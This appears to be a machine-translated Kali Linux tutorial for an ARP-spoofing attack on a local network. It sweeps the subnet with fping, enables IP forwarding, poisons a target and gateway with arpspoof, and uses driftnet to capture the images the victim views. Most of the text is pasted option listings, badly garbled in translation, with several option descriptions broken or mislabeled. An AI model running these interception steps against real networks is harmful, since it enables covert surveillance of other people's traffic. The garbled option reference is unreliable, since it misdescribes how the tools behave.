need to use fping tool with -asg parameter
Survey Options :
-4,IPv4 can only ping IPv4 address
-6--ipv6 only in ping IPv6 address
-b-- size = number of bytes of ping data is sent in bytes ( default :
-b--backoff=n Sets the exponent backoff factor to N ( the default value : 1. 5)
--count=n count mode : sends N ping signals to each target
- f file = file read the file list of the destination file (- indicates stdin)
-g-- generate a list of build targets ( only if no - f is specified )
( give start and end IP, or CIDR address in the target list )
( for example,fping-g 192.168.1.0 192.168.1.255 or fping-g 192.168.1.0/24)
-H,ttl=n Set the IP ttl value ( time to jump in real time )
--iface=iface binding to a specific interface
-l-- Cycle mode : always send ping signal
-m, all using IP with host name ( e.g. IPv4 and IPv6), using -A
-dontfrag Set the non-segmented mark
-o-tos=n Set the type of service (TOS) flag in the ICMP packet
-p,- cycle =msec interval to a target ( in ms)
( in loop and Count mode, default value : milliseconds )
-R, retry retry of =n ( default : 3)
-r-- randomly randomly grouped data ( used to thwart link data compression )
-s-src=ip Collection Source Address
-T,- timeout =msec separate target initial timeout ( default is milliseconds,
In addition to-l/-c/-c, it is- p period to milliseconds )
Output Options :
-A, the living target is alive.
-a-addr displaying targets by address
-C,vcount=n and - C, report results in verbose format
--timestamp print timestamp before each output line
-e--the time that is running in the returned package
-i- interval =msec interval send ping package ( default : Ten milliseconds )
-N, name shows target as name (-D is equivalent )
-n-netdata outputs are compatible with Netdata (-l-q is required )
-o- Downtime shows cumulative outage time ( lost packet interval )
-q- quiet Quiet ( do not show each target / flat result )
The -q-s=secs is the same as- Q but is displayed every n seconds
-S, statistics print final data
-u-Unreachable Target is unreachable
-V, version shown in version
View the IP that you scanned
turn on ARP spoofing with arpspoof-i eth0-t 192.168.1.5 192.168.1.1
Options
-I specify the interface to use.
- host of C | |
specify which hardware address to use when restoring arp Mappings
forming ; when cleaning, you can send packets with your own package
Address and host address. Packets Sent
a fake hw address can break with certain connections
convert /ap/ Bridge configuration, but it is more reliable
instead of using your own address, this is the default way to Arps
cleaned afterwards.
-T Target
specify a specific host to the ARP Poison ( if not specified
LAN host ) . Repeatedly specify multiple hosts.
-R Poison two hosts ( host and Target ) to capture both traffic
the direction. ( only valid in union with - t )
Host Specifies the host to intercept packets ( usually a
Local Gateway ) .
target drone broken network (ARP attack) after successful feedback
Turn off the process
turn on local IP forwarding
[Email protected]:~# echo 1 >/proc/sys/net/ipv4/ip_forward
in Progress (ARP spoofing) arpspoof-i eth0-t 192.168.1.5 192.168.1.1
Target can surf the internet
Use [Email protected]:~# driftnet-i eth0 tool to view the picture information target drone viewed
Options :
-H displays this help message.
-V detailed operation.
b beep when a new image is captured .
-I interface Select the interface to listen to ( default : all
interface ) .
-F file instead of listener interface, read capture
packets from the Pcap dump file ; the file can be a named pipe
used with Kismet , or similar use.
-P does not set the listener interface to chaotic mode.
Auxiliary mode : do not display the image on the screen, but save
Put them in a temporary directory and advertise their names on them.
Standard output.
Maximum number of images saved in the temp directory
In part-time mode.
the-D directory uses the specified temp directory.
the-x prefix is used when saving an image.
-S attempts to extract audio data from the network,
in addition to images. Currently, this supports MPEG data
Only.
-S extracts the audio stream instead of the image.
-M command to play MPEG audio data with the given command
s option ; this should be handled . MPEG Frame
the standard input provided. Default value : "mpg123--".
Main parameters:
-B beeps when capturing a new picture
-I interface Select Listener interface
-f file reads a picture from a specified pcap packet
-P do not allow the listening interface to use promiscuous mode
-A background mode: Saves the captured picture to the directory (not displayed on the screen)
-M number specifies how many pictures to save
-D directory Specifies the path to save the picture
-X prefix specifies the name of the prefix to save the picture
Examples of Use:
1. Real-time monitoring: Driftnet-i wlan0
2. Read a picture from a specified PCAP packet: driftnet-f/home/linger/backup/ap.pcapng-a-d/root/drifnet/
Kali get target drone's picture and look at the URL